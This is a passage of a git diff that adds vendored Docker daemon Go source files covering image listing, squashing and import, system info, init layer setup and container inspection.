(daemon *Daemon) Map() map[image.ID]*image.Image { + return daemon.imageStore.Map() +} + +// Images returns a filtered list of images. filterArgs is a JSON-encoded set +// of filter arguments which will be interpreted by api/types/filters. +// filter is a shell glob string applied to repository names. The argument +// named all controls whether all images in the graph are filtered, or just +// the heads. +func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs bool) ([]*types.ImageSummary, error) { + var ( + allImages map[image.ID]*image.Image + err error + danglingOnly = false + ) + + if err := imageFilters.Validate(acceptedImageFilterTags); err != nil { + return nil, err + } + + if imageFilters.Include("dangling") { + if imageFilters.ExactMatch("dangling", "true") { + danglingOnly = true + } else if !imageFilters.ExactMatch("dangling", "false") { + return nil, fmt.Errorf("Invalid filter 'dangling=%s'", imageFilters.Get("dangling")) + } + } + if danglingOnly { + allImages = daemon.imageStore.Heads() + } else { + allImages = daemon.imageStore.Map() + } + + var beforeFilter, sinceFilter *image.Image + err = imageFilters.WalkValues("before", func(value string) error { + beforeFilter, err = daemon.GetImage(value) + return err + }) + if err != nil { + return nil, err + } + + err = imageFilters.WalkValues("since", func(value string) error { + sinceFilter, err = daemon.GetImage(value) + return err + }) + if err != nil { + return nil, err + } + + images := []*types.ImageSummary{} + var imagesMap map[*image.Image]*types.ImageSummary + var layerRefs map[layer.ChainID]int + var allLayers map[layer.ChainID]layer.Layer + var allContainers []*container.Container + + for id, img := range allImages { + if beforeFilter != nil { + if img.Created.Equal(beforeFilter.Created) || img.Created.After(beforeFilter.Created) { + continue + } + } + + if sinceFilter != nil { + if img.Created.Equal(sinceFilter.Created) || img.Created.Before(sinceFilter.Created) { + continue + } + } + + if imageFilters.Include("label") { + // Very old image that do not have image.Config (or even labels) + if img.Config == nil { + continue + } + // We are now sure image.Config is not nil + if !imageFilters.MatchKVList("label", img.Config.Labels) { + continue + } + } + + layerID := img.RootFS.ChainID() + var size int64 + if layerID != "" { + l, err := daemon.layerStore.Get(layerID) + if err != nil { + return nil, err + } + + size, err = l.Size() + layer.ReleaseAndLog(daemon.layerStore, l) + if err != nil { + return nil, err + } + } + + newImage := newImage(img, size) + + for _, ref := range daemon.referenceStore.References(id.Digest()) { + if imageFilters.Include("reference") { + var found bool + var matchErr error + for _, pattern := range imageFilters.Get("reference") { + found, matchErr = reference.Match(pattern, ref) + if matchErr != nil { + return nil, matchErr + } + } + if !found { + continue + } + } + if _, ok := ref.(reference.Canonical); ok { + newImage.RepoDigests = append(newImage.RepoDigests, ref.String()) + } + if _, ok := ref.(reference.NamedTagged); ok { + newImage.RepoTags = append(newImage.RepoTags, ref.String()) + } + } + if newImage.RepoDigests == nil && newImage.RepoTags == nil { + if all || len(daemon.imageStore.Children(id)) == 0 { + + if imageFilters.Include("dangling") && !danglingOnly { + //dangling=false case, so dangling image is not needed + continue + } + if imageFilters.Include("reference") { // skip images with no references if filtering by reference + continue + } + newImage.RepoDigests = []string{"@"} + newImage.RepoTags = []string{":"} + } else { + continue + } + } else if danglingOnly && len(newImage.RepoTags) > 0 { + continue + } + + if withExtraAttrs { + // lazyly init variables + if imagesMap == nil { + allContainers = daemon.List() + allLayers = daemon.layerStore.Map() + imagesMap = make(map[*image.Image]*types.ImageSummary) + layerRefs = make(map[layer.ChainID]int) + } + + // Get container count + newImage.Containers = 0 + for _, c := range allContainers { + if c.ImageID == id { + newImage.Containers++ + } + } + + // count layer references + rootFS := *img.RootFS + rootFS.DiffIDs = nil + for _, id := range img.RootFS.DiffIDs { + rootFS.Append(id) + chid := rootFS.ChainID() + layerRefs[chid]++ + if _, ok := allLayers[chid]; !ok { + return nil, fmt.Errorf("layer %v was not found (corruption?)", chid) + } + } + imagesMap[img] = newImage + } + + images = append(images, newImage) + } + + if withExtraAttrs { + // Get Shared sizes + for img, newImage := range imagesMap { + rootFS := *img.RootFS + rootFS.DiffIDs = nil + + newImage.SharedSize = 0 + for _, id := range img.RootFS.DiffIDs { + rootFS.Append(id) + chid := rootFS.ChainID() + + diffSize, err := allLayers[chid].DiffSize() + if err != nil { + return nil, err + } + + if layerRefs[chid] > 1 { + newImage.SharedSize += diffSize + } + } + } + } + + sort.Sort(sort.Reverse(byCreated(images))) + + return images, nil +} + +// SquashImage creates a new image with the diff of the specified image and the specified parent. +// This new image contains only the layers from it's parent + 1 extra layer which contains the diff of all the layers in between. +// The existing image(s) is not destroyed. +// If no parent is specified, a new image with the diff of all the specified image's layers merged into a new layer that has no parents. +func (daemon *Daemon) SquashImage(id, parent string) (string, error) { + img, err := daemon.imageStore.Get(image.ID(id)) + if err != nil { + return "", err + } + + var parentImg *image.Image + var parentChainID layer.ChainID + if len(parent) != 0 { + parentImg, err = daemon.imageStore.Get(image.ID(parent)) + if err != nil { + return "", errors.Wrap(err, "error getting specified parent layer") + } + parentChainID = parentImg.RootFS.ChainID() + } else { + rootFS := image.NewRootFS() + parentImg = &image.Image{RootFS: rootFS} + } + + l, err := daemon.layerStore.Get(img.RootFS.ChainID()) + if err != nil { + return "", errors.Wrap(err, "error getting image layer") + } + defer daemon.layerStore.Release(l) + + ts, err := l.TarStreamFrom(parentChainID) + if err != nil { + return "", errors.Wrapf(err, "error getting tar stream to parent") + } + defer ts.Close() + + newL, err := daemon.layerStore.Register(ts, parentChainID) + if err != nil { + return "", errors.Wrap(err, "error registering layer") + } + defer daemon.layerStore.Release(newL) + + var newImage image.Image + newImage = *img + newImage.RootFS = nil + + var rootFS image.RootFS + rootFS = *parentImg.RootFS + rootFS.DiffIDs = append(rootFS.DiffIDs, newL.DiffID()) + newImage.RootFS = &rootFS + + for i, hi := range newImage.History { + if i >= len(parentImg.History) { + hi.EmptyLayer = true + } + newImage.History[i] = hi + } + + now := time.Now() + var historyComment string + if len(parent) > 0 { + historyComment = fmt.Sprintf("merge %s to %s", id, parent) + } else { + historyComment = fmt.Sprintf("create new from %s", id) + } + + newImage.History = append(newImage.History, image.History{ + Created: now, + Comment: historyComment, + }) + newImage.Created = now + + b, err := json.Marshal(&newImage) + if err != nil { + return "", errors.Wrap(err, "error marshalling image config") + } + + newImgID, err := daemon.imageStore.Create(b) + if err != nil { + return "", errors.Wrap(err, "error creating new image after squash") + } + return string(newImgID), nil +} + +func newImage(image *image.Image, virtualSize int64) *types.ImageSummary { + newImage := new(types.ImageSummary) + newImage.ParentID = image.Parent.String() + newImage.ID = image.ID().String() + newImage.Created = image.Created.Unix() + newImage.Size = virtualSize + newImage.VirtualSize = virtualSize + newImage.SharedSize = -1 + newImage.Containers = -1 + if image.Config != nil { + newImage.Labels = image.Config.Labels + } + return newImage +} diff --git a/vendor/github.com/docker/docker/daemon/import.go b/vendor/github.com/docker/docker/daemon/import.go new file mode 100644 index 0000000000..c93322b92e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/import.go @@ -0,0 +1,135 @@ +package daemon + +import ( + "encoding/json" + "errors" + "io" + "net/http" + "net/url" + "runtime" + "time" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder/dockerfile" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/httputils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/docker/reference" +) + +// ImportImage imports an image, getting the archived layer data either from +// inConfig (if src is "-"), or from a URI specified in src. Progress output is +// written to outStream. Repository and tag names can optionally be given in +// the repo and tag arguments, respectively. +func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string, inConfig io.ReadCloser, outStream io.Writer, changes []string) error { + var ( + sf = streamformatter.NewJSONStreamFormatter() + rc io.ReadCloser + resp *http.Response + newRef reference.Named + ) + + if repository != "" { + var err error + newRef, err = reference.ParseNamed(repository) + if err != nil { + return err + } + + if _, isCanonical := newRef.(reference.Canonical); isCanonical { + return errors.New("cannot import digest reference") + } + + if tag != "" { + newRef, err = reference.WithTag(newRef, tag) + if err != nil { + return err + } + } + } + + config, err := dockerfile.BuildFromConfig(&container.Config{}, changes) + if err != nil { + return err + } + if src == "-" { + rc = inConfig + } else { + inConfig.Close() + u, err := url.Parse(src) + if err != nil { + return err + } + if u.Scheme == "" { + u.Scheme = "http" + u.Host = src + u.Path = "" + } + outStream.Write(sf.FormatStatus("", "Downloading from %s", u)) + resp, err = httputils.Download(u.String()) + if err != nil { + return err + } + progressOutput := sf.NewProgressOutput(outStream, true) + rc = progress.NewProgressReader(resp.Body, progressOutput, resp.ContentLength, "", "Importing") + } + + defer rc.Close() + if len(msg) == 0 { + msg = "Imported from " + src + } + + inflatedLayerData, err := archive.DecompressStream(rc) + if err != nil { + return err + } + // TODO: support windows baselayer? + l, err := daemon.layerStore.Register(inflatedLayerData, "") + if err != nil { + return err + } + defer layer.ReleaseAndLog(daemon.layerStore, l) + + created := time.Now().UTC() + imgConfig, err := json.Marshal(&image.Image{ + V1Image: image.V1Image{ + DockerVersion: dockerversion.Version, + Config: config, + Architecture: runtime.GOARCH, + OS: runtime.GOOS, + Created: created, + Comment: msg, + }, + RootFS: &image.RootFS{ + Type: "layers", + DiffIDs: []layer.DiffID{l.DiffID()}, + }, + History: []image.History{{ + Created: created, + Comment: msg, + }}, + }) + if err != nil { + return err + } + + id, err := daemon.imageStore.Create(imgConfig) + if err != nil { + return err + } + + // FIXME: connect with commit code and call refstore directly + if newRef != nil { + if err := daemon.TagImageWithReference(id, newRef); err != nil { + return err + } + } + + daemon.LogImageEvent(id.String(), id.String(), "import") + outStream.Write(sf.FormatStatus("", id.String())) + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/info.go b/vendor/github.com/docker/docker/daemon/info.go new file mode 100644 index 0000000000..1ab9f29592 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/info.go @@ -0,0 +1,180 @@ +package daemon + +import ( + "fmt" + "os" + "runtime" + "sync/atomic" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api" + "github.com/docker/docker/api/types" + "github.com/docker/docker/container" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/pkg/fileutils" + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/docker/docker/pkg/parsers/operatingsystem" + "github.com/docker/docker/pkg/platform" + "github.com/docker/docker/pkg/sysinfo" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/registry" + "github.com/docker/docker/utils" + "github.com/docker/docker/volume/drivers" + "github.com/docker/go-connections/sockets" +) + +// SystemInfo returns information about the host server the daemon is running on. +func (daemon *Daemon) SystemInfo() (*types.Info, error) { + kernelVersion := "" + if kv, err := kernel.GetKernelVersion(); err != nil { + logrus.Warnf("Could not get kernel version: %v", err) + } else { + kernelVersion = kv.String() + } + + operatingSystem := "" + if s, err := operatingsystem.GetOperatingSystem(); err != nil { + logrus.Warnf("Could not get operating system name: %v", err) + } else { + operatingSystem = s + } + + // Don't do containerized check on Windows + if runtime.GOOS != "windows" { + if inContainer, err := operatingsystem.IsContainerized(); err != nil { + logrus.Errorf("Could not determine if daemon is containerized: %v", err) + operatingSystem += " (error determining if containerized)" + } else if inContainer { + operatingSystem += " (containerized)" + } + } + + meminfo, err := system.ReadMemInfo() + if err != nil { + logrus.Errorf("Could not read system memory info: %v", err) + meminfo = &system.MemInfo{} + } + + sysInfo := sysinfo.New(true) + + var cRunning, cPaused, cStopped int32 + daemon.containers.ApplyAll(func(c *container.Container) { + switch c.StateString() { + case "paused": + atomic.AddInt32(&cPaused, 1) + case "running": + atomic.AddInt32(&cRunning, 1) + default: + atomic.AddInt32(&cStopped, 1) + } + }) + + securityOptions := []string{} + if sysInfo.AppArmor { + securityOptions = append(securityOptions, "name=apparmor") + } + if sysInfo.Seccomp && supportsSeccomp { + profile := daemon.seccompProfilePath + if profile == "" { + profile = "default" + } + securityOptions = append(securityOptions, fmt.Sprintf("name=seccomp,profile=%s", profile)) + } + if selinuxEnabled() { + securityOptions = append(securityOptions, "name=selinux") + } + uid, gid := daemon.GetRemappedUIDGID() + if uid != 0 || gid != 0 { + securityOptions = append(securityOptions, "name=userns") + } + + v := &types.Info{ + ID: daemon.ID, + Containers: int(cRunning + cPaused + cStopped), + ContainersRunning: int(cRunning), + ContainersPaused: int(cPaused), + ContainersStopped: int(cStopped), + Images: len(daemon.imageStore.Map()), + Driver: daemon.GraphDriverName(), + DriverStatus: daemon.layerStore.DriverStatus(), + Plugins: daemon.showPluginsInfo(), + IPv4Forwarding: !sysInfo.IPv4ForwardingDisabled, + BridgeNfIptables: !sysInfo.BridgeNFCallIPTablesDisabled, + BridgeNfIP6tables: !sysInfo.BridgeNFCallIP6TablesDisabled, + Debug: utils.IsDebugEnabled(), + NFd: fileutils.GetTotalUsedFds(), + NGoroutines: runtime.NumGoroutine(), + SystemTime: time.Now().Format(time.RFC3339Nano), + LoggingDriver: daemon.defaultLogConfig.Type, + CgroupDriver: daemon.getCgroupDriver(), + NEventsListener: daemon.EventsService.SubscribersCount(), + KernelVersion: kernelVersion, + OperatingSystem: operatingSystem, + IndexServerAddress: registry.IndexServer, + OSType: platform.OSType, + Architecture: platform.Architecture, + RegistryConfig: daemon.RegistryService.ServiceConfig(), + NCPU: sysinfo.NumCPU(), + MemTotal: meminfo.MemTotal, + DockerRootDir: daemon.configStore.Root, + Labels: daemon.configStore.Labels, + ExperimentalBuild: daemon.configStore.Experimental, + ServerVersion: dockerversion.Version, + ClusterStore: daemon.configStore.ClusterStore, + ClusterAdvertise: daemon.configStore.ClusterAdvertise, + HTTPProxy: sockets.GetProxyEnv("http_proxy"), + HTTPSProxy: sockets.GetProxyEnv("https_proxy"), + NoProxy: sockets.GetProxyEnv("no_proxy"), + LiveRestoreEnabled: daemon.configStore.LiveRestoreEnabled, + SecurityOptions: securityOptions, + Isolation: daemon.defaultIsolation, + } + + // Retrieve platform specific info + daemon.FillPlatformInfo(v, sysInfo) + + hostname := "" + if hn, err := os.Hostname(); err != nil { + logrus.Warnf("Could not get hostname: %v", err) + } else { + hostname = hn + } + v.Name = hostname + + return v, nil +} + +// SystemVersion returns version information about the daemon. +func (daemon *Daemon) SystemVersion() types.Version { + v := types.Version{ + Version: dockerversion.Version, + GitCommit: dockerversion.GitCommit, + MinAPIVersion: api.MinVersion, + GoVersion: runtime.Version(), + Os: runtime.GOOS, + Arch: runtime.GOARCH, + BuildTime: dockerversion.BuildTime, + Experimental: daemon.configStore.Experimental, + } + + kernelVersion := "" + if kv, err := kernel.GetKernelVersion(); err != nil { + logrus.Warnf("Could not get kernel version: %v", err) + } else { + kernelVersion = kv.String() + } + v.KernelVersion = kernelVersion + + return v +} + +func (daemon *Daemon) showPluginsInfo() types.PluginsInfo { + var pluginsInfo types.PluginsInfo + + pluginsInfo.Volume = volumedrivers.GetDriverList() + pluginsInfo.Network = daemon.GetNetworkDriverList() + pluginsInfo.Authorization = daemon.configStore.AuthorizationPlugins + + return pluginsInfo +} diff --git a/vendor/github.com/docker/docker/daemon/info_unix.go b/vendor/github.com/docker/docker/daemon/info_unix.go new file mode 100644 index 0000000000..9c41c0e4cd --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/info_unix.go @@ -0,0 +1,82 @@ +// +build !windows + +package daemon + +import ( + "context" + "os/exec" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/pkg/sysinfo" +) + +// FillPlatformInfo fills the platform related info. +func (daemon *Daemon) FillPlatformInfo(v *types.Info, sysInfo *sysinfo.SysInfo) { + v.MemoryLimit = sysInfo.MemoryLimit + v.SwapLimit = sysInfo.SwapLimit + v.KernelMemory = sysInfo.KernelMemory + v.OomKillDisable = sysInfo.OomKillDisable + v.CPUCfsPeriod = sysInfo.CPUCfsPeriod + v.CPUCfsQuota = sysInfo.CPUCfsQuota + v.CPUShares = sysInfo.CPUShares + v.CPUSet = sysInfo.Cpuset + v.Runtimes = daemon.configStore.GetAllRuntimes() + v.DefaultRuntime = daemon.configStore.GetDefaultRuntimeName() + v.InitBinary = daemon.configStore.GetInitPath() + + v.ContainerdCommit.Expected = dockerversion.ContainerdCommitID + if sv, err := daemon.containerd.GetServerVersion(context.Background()); err == nil { + v.ContainerdCommit.ID = sv.Revision + } else { + logrus.Warnf("failed to retrieve containerd version: %v", err) + v.ContainerdCommit.ID = "N/A" + } + + v.RuncCommit.Expected = dockerversion.RuncCommitID + if rv, err := exec.Command(DefaultRuntimeBinary, "--version").Output(); err == nil { + parts := strings.Split(strings.TrimSpace(string(rv)), "\n") + if len(parts) == 3 { + parts = strings.Split(parts[1], ": ") + if len(parts) == 2 { + v.RuncCommit.ID = strings.TrimSpace(parts[1]) + } + } + + if v.RuncCommit.ID == "" { + logrus.Warnf("failed to retrieve %s version: unknown output format: %s", DefaultRuntimeBinary, string(rv)) + v.RuncCommit.ID = "N/A" + } + } else { + logrus.Warnf("failed to retrieve %s version: %v", DefaultRuntimeBinary, err) + v.RuncCommit.ID = "N/A" + } + + v.InitCommit.Expected = dockerversion.InitCommitID + if rv, err := exec.Command(DefaultInitBinary, "--version").Output(); err == nil { + parts := strings.Split(strings.TrimSpace(string(rv)), " - ") + if len(parts) == 2 { + if dockerversion.InitCommitID[0] == 'v' { + vs := strings.TrimPrefix(parts[0], "tini version ") + v.InitCommit.ID = "v" + vs + } else { + // Get the sha1 + gitParts := strings.Split(parts[1], ".") + if len(gitParts) == 2 && gitParts[0] == "git" { + v.InitCommit.ID = gitParts[1] + v.InitCommit.Expected = dockerversion.InitCommitID[0:len(gitParts[1])] + } + } + } + + if v.InitCommit.ID == "" { + logrus.Warnf("failed to retrieve %s version: unknown output format: %s", DefaultInitBinary, string(rv)) + v.InitCommit.ID = "N/A" + } + } else { + logrus.Warnf("failed to retrieve %s version", DefaultInitBinary) + v.InitCommit.ID = "N/A" + } +} diff --git a/vendor/github.com/docker/docker/daemon/info_windows.go b/vendor/github.com/docker/docker/daemon/info_windows.go new file mode 100644 index 0000000000..c700911eb0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/info_windows.go @@ -0,0 +1,10 @@ +package daemon + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/sysinfo" +) + +// FillPlatformInfo fills the platform related info. +func (daemon *Daemon) FillPlatformInfo(v *types.Info, sysInfo *sysinfo.SysInfo) { +} diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go new file mode 100644 index 0000000000..66d53f0eef --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go @@ -0,0 +1,13 @@ +// +build solaris,cgo + +package initlayer + +// Setup populates a directory with mountpoints suitable +// for bind-mounting dockerinit into the container. The mountpoint is simply an +// empty file at /.dockerinit +// +// This extra layer is used by all containers as the top-most ro layer. It protects +// the container from unwanted side-effects on the rw layer. +func Setup(initLayer string, rootUID, rootGID int) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go new file mode 100644 index 0000000000..e83c2751ed --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go @@ -0,0 +1,69 @@ +// +build linux freebsd + +package initlayer + +import ( + "os" + "path/filepath" + "strings" + "syscall" + + "github.com/docker/docker/pkg/idtools" +) + +// Setup populates a directory with mountpoints suitable +// for bind-mounting things into the container. +// +// This extra layer is used by all containers as the top-most ro layer. It protects +// the container from unwanted side-effects on the rw layer. +func Setup(initLayer string, rootUID, rootGID int) error { + for pth, typ := range map[string]string{ + "/dev/pts": "dir", + "/dev/shm": "dir", + "/proc": "dir", + "/sys": "dir", + "/.dockerenv": "file", + "/etc/resolv.conf": "file", + "/etc/hosts": "file", + "/etc/hostname": "file", + "/dev/console": "file", + "/etc/mtab": "/proc/mounts", + } { + parts := strings.Split(pth, "/") + prev := "/" + for _, p := range parts[1:] { + prev = filepath.Join(prev, p) + syscall.Unlink(filepath.Join(initLayer, prev)) + } + + if _, err := os.Stat(filepath.Join(initLayer, pth)); err != nil { + if os.IsNotExist(err) { + if err := idtools.MkdirAllNewAs(filepath.Join(initLayer, filepath.Dir(pth)), 0755, rootUID, rootGID); err != nil { + return err + } + switch typ { + case "dir": + if err := idtools.MkdirAllNewAs(filepath.Join(initLayer, pth), 0755, rootUID, rootGID); err != nil { + return err + } + case "file": + f, err := os.OpenFile(filepath.Join(initLayer, pth), os.O_CREATE, 0755) + if err != nil { + return err + } + f.Chown(rootUID, rootGID) + f.Close() + default: + if err := os.Symlink(typ, filepath.Join(initLayer, pth)); err != nil { + return err + } + } + } else { + return err + } + } + } + + // Layer is ready to use, if it wasn't before. + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go new file mode 100644 index 0000000000..48a9d71aa5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go @@ -0,0 +1,13 @@ +// +build windows + +package initlayer + +// Setup populates a directory with mountpoints suitable +// for bind-mounting dockerinit into the container. The mountpoint is simply an +// empty file at /.dockerinit +// +// This extra layer is used by all containers as the top-most ro layer. It protects +// the container from unwanted side-effects on the rw layer. +func Setup(initLayer string, rootUID, rootGID int) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/inspect.go b/vendor/github.com/docker/docker/daemon/inspect.go new file mode 100644 index 0000000000..557f639de1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/inspect.go @@ -0,0 +1,264 @@ +package daemon + +import ( + "fmt" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/api/types/versions/v1p20" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/network" +) + +// ContainerInspect returns low-level information about a +// container. Returns an error if the container cannot be found, or if +// there is an error getting the data. +func (daemon *Daemon) ContainerInspect(name string, size bool, version string) (interface{}, error) { + switch { + case versions.LessThan(version, "1.20"): + return daemon.containerInspectPre120(name) + case versions.Equal(version, "1.20"): + return daemon.containerInspect120(name) + } + return daemon.ContainerInspectCurrent(name, size) +} + +// ContainerInspectCurrent returns low-level information about a +// container in a most recent api version. +func (daemon *Daemon) ContainerInspectCurrent(name string, size bool) (*types.ContainerJSON, error) { + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + container.Lock() + defer container.Unlock() + + base, err := daemon.getInspectData(container, size) + if err != nil { + return nil, err + } + + apiNetworks := make(map[string]*networktypes.EndpointSettings) + for name, epConf := range container.NetworkSettings.Networks { + if epConf.EndpointSettings != nil { + apiNetworks[name] = epConf.EndpointSettings + } + } + + mountPoints := addMountPoints(container) + networkSettings := &types.NetworkSettings{ + NetworkSettingsBase: types.NetworkSettingsBase{ + Bridge: container.NetworkSettings.Bridge, + SandboxID: container.NetworkSettings.SandboxID, + HairpinMode: container.NetworkSettings.HairpinMode, + LinkLocalIPv6Address: container.NetworkSettings.LinkLocalIPv6Address, + LinkLocalIPv6PrefixLen: container.NetworkSettings.LinkLocalIPv6PrefixLen, + Ports: container.NetworkSettings.Ports, + SandboxKey: container.NetworkSettings.SandboxKey, + SecondaryIPAddresses: container.NetworkSettings.SecondaryIPAddresses, + SecondaryIPv6Addresses: container.NetworkSettings.SecondaryIPv6Addresses, + }, + DefaultNetworkSettings: daemon.getDefaultNetworkSettings(container.NetworkSettings.Networks), + Networks: apiNetworks, + } + + return &types.ContainerJSON{ + ContainerJSONBase: base, + Mounts: mountPoints, + Config: container.Config, + NetworkSettings: networkSettings, + }, nil +} + +// containerInspect120 serializes the master version of a container into a json type. +func (daemon *Daemon) containerInspect120(name string) (*v1p20.ContainerJSON, error) { + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + container.Lock() + defer container.Unlock() + + base, err := daemon.getInspectData(container, false) + if err != nil { + return nil, err + } + + mountPoints := addMountPoints(container) + config := &v1p20.ContainerConfig{ + Config: container.Config, + MacAddress: container.Config.MacAddress, + NetworkDisabled: container.Config.NetworkDisabled, + ExposedPorts: container.Config.ExposedPorts, + VolumeDriver: container.HostConfig.VolumeDriver, + } + networkSettings := daemon.getBackwardsCompatibleNetworkSettings(container.NetworkSettings) + + return &v1p20.ContainerJSON{ + ContainerJSONBase: base, + Mounts: mountPoints, + Config: config, + NetworkSettings: networkSettings, + }, nil +} + +func (daemon *Daemon) getInspectData(container *container.Container, size bool) (*types.ContainerJSONBase, error) { + // make a copy to play with + hostConfig := *container.HostConfig + + children := daemon.children(container) + hostConfig.Links = nil // do not expose the internal structure + for linkAlias, child := range children { + hostConfig.Links = append(hostConfig.Links, fmt.Sprintf("%s:%s", child.Name, linkAlias)) + } + + // We merge the Ulimits from hostConfig with daemon default + daemon.mergeUlimits(&hostConfig) + + var containerHealth *types.Health + if container.State.Health != nil { + containerHealth = &types.Health{ + Status: container.State.Health.Status, + FailingStreak: container.State.Health.FailingStreak, + Log: append([]*types.HealthcheckResult{}, container.State.Health.Log...), + } + } + + containerState := &types.ContainerState{ + Status: container.State.StateString(), + Running: container.State.Running, + Paused: container.State.Paused, + Restarting: container.State.Restarting, + OOMKilled: container.State.OOMKilled, + Dead: container.State.Dead, + Pid: container.State.Pid, + ExitCode: container.State.ExitCode(), + Error: container.State.Error(), + StartedAt: container.State.StartedAt.Format(time.RFC3339Nano), + FinishedAt: container.State.FinishedAt.Format(time.RFC3339Nano), + Health: containerHealth, + } + + contJSONBase := &types.ContainerJSONBase{ + ID: container.ID, + Created: container.Created.Format(time.RFC3339Nano), + Path: container.Path, + Args: container.Args, + State: containerState, + Image: container.ImageID.String(), + LogPath: container.LogPath, + Name: container.Name, + RestartCount: container.RestartCount, + Driver: container.Driver, + MountLabel: container.MountLabel, + ProcessLabel: container.ProcessLabel, + ExecIDs: container.GetExecIDs(), + HostConfig: &hostConfig, + } + + var ( + sizeRw int64 + sizeRootFs int64 + ) + if size { + sizeRw, sizeRootFs = daemon.getSize(container) + contJSONBase.SizeRw = &sizeRw + contJSONBase.SizeRootFs = &sizeRootFs + } + + // Now set any platform-specific fields + contJSONBase = setPlatformSpecificContainerFields(container, contJSONBase) + + contJSONBase.GraphDriver.Name = container.Driver + + graphDriverData, err := container.RWLayer.Metadata() + // If container is marked as Dead, the container's graphdriver metadata + // could have been removed, it will cause error if we try to get the metadata, + // we can ignore the error if the container is dead. + if err != nil && !container.Dead { + return nil, err + } + contJSONBase.GraphDriver.Data = graphDriverData + + return contJSONBase, nil +} + +// ContainerExecInspect returns low-level information about the exec +// command. An error is returned if the exec cannot be found. +func (daemon *Daemon) ContainerExecInspect(id string) (*backend.ExecInspect, error) { + e, err := daemon.getExecConfig(id) + if err != nil { + return nil, err + } + + pc := inspectExecProcessConfig(e) + + return &backend.ExecInspect{ + ID: e.ID, + Running: e.Running, + ExitCode: e.ExitCode, + ProcessConfig: pc, + OpenStdin: e.OpenStdin, + OpenStdout: e.OpenStdout, + OpenStderr: e.OpenStderr, + CanRemove: e.CanRemove, + ContainerID: e.ContainerID, + DetachKeys: e.DetachKeys, + Pid: e.Pid, + }, nil +} + +// VolumeInspect looks up a volume by name. An error is returned if +// the volume cannot be found. +func (daemon *Daemon) VolumeInspect(name string) (*types.Volume, error) { + v, err := daemon.volumes.Get(name) + if err != nil { + return nil, err + } + apiV := volumeToAPIType(v) + apiV.Mountpoint = v.Path() + apiV.Status = v.Status() + return apiV, nil +} + +func (daemon *Daemon) getBackwardsCompatibleNetworkSettings(settings *network.Settings) *v1p20.NetworkSettings { + result := &v1p20.NetworkSettings{ + NetworkSettingsBase: types.NetworkSettingsBase{ + Bridge: settings.Bridge, + SandboxID: settings.SandboxID, + HairpinMode: settings.HairpinMode, + LinkLocalIPv6Address: settings.LinkLocalIPv6Address, + LinkLocalIPv6PrefixLen: settings.LinkLocalIPv6PrefixLen, + Ports: settings.Ports, + SandboxKey: settings.SandboxKey, + SecondaryIPAddresses: settings.SecondaryIPAddresses, + SecondaryIPv6Addresses: settings.SecondaryIPv6Addresses, + }, + DefaultNetworkSettings: daemon.getDefaultNetworkSettings(settings.Networks), + } + + return result +} + +// getDefaultNetworkSettings creates the deprecated structure that holds the information +// about the bridge network for a container. +func (daemon *Daemon) getDefaultNetworkSettings(networks map[string]*network.EndpointSettings) types.DefaultNetworkSettings { + var settings types.DefaultNetworkSettings + + if defaultNetwork, ok := networks["bridge"]; ok && defaultNetwork.EndpointSettings != nil { + settings.EndpointID = defaultNetwork.EndpointID + settings.Gateway = defaultNetwork.Gateway + settings.GlobalIPv6Address = defaultNetwork.GlobalIPv6Address + settings.GlobalIPv6PrefixLen = defaultNetwork.GlobalIPv6PrefixLen + settings.IPAddress = defaultNetwork.IPAddress + settings.IPPrefixLen = defaultNetwork.IPPrefixLen + settings.IPv6Gateway = defaultNetwork.IPv6Gateway + settings.MacAddress = defaultNetwork.MacAddress + } + return settings +} diff --git a/vendor/github.com/docker/docker/daemon/inspect_solaris.go b/vendor/github.com/docker/docker/daemon/inspect_solaris.go new file mode 100644 index 0000000000..0e3dcc1119 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/inspect_solaris.go @@ -0,0 +1,41 @@ +package daemon + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/versions/v1p19" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" +) + +// This sets platform-specific fields +func setPlatformSpecificContainerFields(container *container.Container, contJSONBase *types.ContainerJSONBase) *types.ContainerJSONBase { + return contJSONBase +} + +// containerInspectPre120 get containers for pre 1.20 APIs. +func (daemon *Daemon) containerInspectPre120(name string) (*v1p19.ContainerJSON, error) { + return &v1p19.ContainerJSON{}, 